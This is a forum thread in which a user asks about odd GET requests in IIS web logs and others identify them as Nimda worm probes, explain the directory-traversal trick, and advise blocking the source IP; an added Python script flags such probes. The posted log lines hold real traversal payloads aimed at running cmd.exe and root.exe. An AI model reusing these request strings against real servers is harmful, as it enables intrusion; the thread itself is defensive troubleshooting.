Why are there GET commands in my IIS Web Log files?

uopercival asked:
I'm getting some GET commands from IPs that originate from my service provider. Any reason it's doing this?

2003-01-10 01:20:29 142.179.86.227 - 192.168.1.1 80 GET /scripts/root.exe /c+dir 404 -
2003-01-10 01:20:29 142.179.86.227 - 192.168.1.1 80 GET /MSADC/root.exe /c+dir 403 -
2003-01-10 01:20:31 142.179.86.227 - 192.168.1.1 80 GET /c/winnt/system32/cmd.exe /c+dir 404 -
2003-01-10 01:20:31 142.179.86.227 - 192.168.1.1 80 GET /d/winnt/system32/cmd.exe /c+dir 404 -
2003-01-10 01:20:32 142.179.86.227 - 192.168.1.1 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 -
2003-01-10 01:20:32 142.179.86.227 - 192.168.1.1 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 500 -
2003-01-10 01:20:33 142.179.86.227 - 192.168.1.1 80 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 -
2003-01-10 01:20:33 142.179.86.227 - 192.168.1.1 80 GET /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe /c+dir 403 -
2003-01-10 01:20:34 142.179.86.227 - 192.168.1.1 80 GET /scripts/..Á../winnt/system32/cmd.exe /c+dir 404 -
2003-01-10 01:20:34 142.179.86.227 - 192.168.1.1 80 GET /scripts/winnt/system32/cmd.exe /c+dir 404 -
2003-01-10 01:20:35 142.179.86.227 - 192.168.1.1 80 GET /winnt/system32/cmd.exe /c+dir 404 -
2003-01-10 01:20:35 142.179.86.227 - 192.168.1.1 80 GET /winnt/system32/cmd.exe /c+dir 404 -
2003-01-10 01:20:37 142.179.86.227 - 192.168.1.1 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 -
2003-01-10 01:20:37 142.179.86.227 - 192.168.1.1 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 -
2003-01-10 01:20:38 142.179.86.227 - 192.168.1.1 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 -
2003-01-10 01:20:38 142.179.86.227 - 192.168.1.1 80 GET /scripts/..%2f../winnt/system32/cmd.exe /c+dir 404 -

Commented:
Contact your ISP.  The way it looks right now, it seems like someone is trying to hack your web server.

Commented:
This is standard NIMDA Worm traffic.  You're OK, all the response codes are 4XX.  That means the server REJECTED the request.

Author

Commented:
Thanks jhance.. that would explain why about a week ago, the server picked up Nimda A and E. I had only activated the IIS Web server for about a week. Cleaned it off and did all the critical updates.
Does someone actually send out this stuff or is it originated from other peoples infected html scripts?

Commented:
NIMDA spreads mainly by cross-directory traversal (as you see above).  It tries to use a misconfiguration in the IIS server to run CMD.EXE in the context of the IIS account's privilege and infect the server.

In your case, you're getting hit by attempts but the 404 means that the server is rejecting the request, which is as it should be.

The only concern is that if the originating IP address is YOUR system, you need to fix your problem.
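An added example (not code from the thread) of the check the answers above describe: it parses IIS W3C log lines like the ones in the question, flags the traversal and cmd.exe/root.exe probes, and reports per source IP whether any probe was actually served (2xx) rather than rejected. The field order and the sample lines are assumptions based on the question's log excerpt.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Constructed sample in the W3C extended format shown in the question; the
# field order (date time c-ip cs-username s-ip s-port cs-method cs-uri-stem
# cs-uri-query sc-status ...) is assumed from those lines.
SAMPLE_LOG = """\
2003-01-10 01:20:29 142.179.86.227 - 192.168.1.1 80 GET /scripts/root.exe /c+dir 404 -
2003-01-10 01:20:32 142.179.86.227 - 192.168.1.1 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 -
2003-01-10 01:20:32 142.179.86.227 - 192.168.1.1 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 500 -
2003-01-10 01:20:38 142.179.86.227 - 192.168.1.1 80 GET /scripts/..%2f../winnt/system32/cmd.exe /c+dir 404 -
2003-01-10 01:21:00 10.0.0.5 - 192.168.1.1 80 GET /index.htm - 200 -
"""

# Signatures of the probes discussed above: a "../" or "..\" segment after
# percent-decoding, and/or a request whose target is cmd.exe or root.exe.
TRAVERSAL = re.compile(r"\.\.[\\/]")
SHELL_TARGET = re.compile(r"/(cmd|root)\.exe$", re.IGNORECASE)


def parse_line(line):
    """Split one log line into the fields we need; None if it is too short."""
    f = line.split()
    if len(f) < 10:
        return None
    return {"date": f[0], "time": f[1], "c_ip": f[2], "method": f[6],
            "uri": f[7], "query": f[8], "status": int(f[9])}


def is_probe(rec):
    uri = unquote(rec["uri"])  # %5c -> '\', %2f -> '/'
    return bool(TRAVERSAL.search(uri) or SHELL_TARGET.search(uri))


def summarize(log_text):
    """Per source IP: number of probes, and how many got a 2xx (served)
    versus any other status (rejected by the server or errored)."""
    report = {}
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or not is_probe(rec):
            continue
        entry = report.setdefault(rec["c_ip"], Counter())
        entry["probes"] += 1
        entry["served" if 200 <= rec["status"] < 300 else "not_served"] += 1
    return report
```

Any IP with a non-zero "served" count deserves a look, since it means a traversal request was answered rather than refused.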
VGR

Commented:
I was told that the shown IP@ is forged and so unreliable.
Commented:
Nope.  NIMDA does not forge IP addresses.  The 142.179.86.227 is very likely the real culprit.

It appears to be a customer of TELUS, probably a DSL line customer.  Not at all uncommon.  If it persists, you may want to put an IP block on this address in your router or firewall.

Author

Commented:
I will continue to monitor the IP and put a block into the router if it persists. I have sent Telus some log files but who knows if they will actually do anything about it. Thanks for the help, it makes sense now.
VGR

Commented:
Although it doesn't change the fact that attempts end up in the log files, I sometimes add in httpd.conf a "Deny X.X.X.X" line.
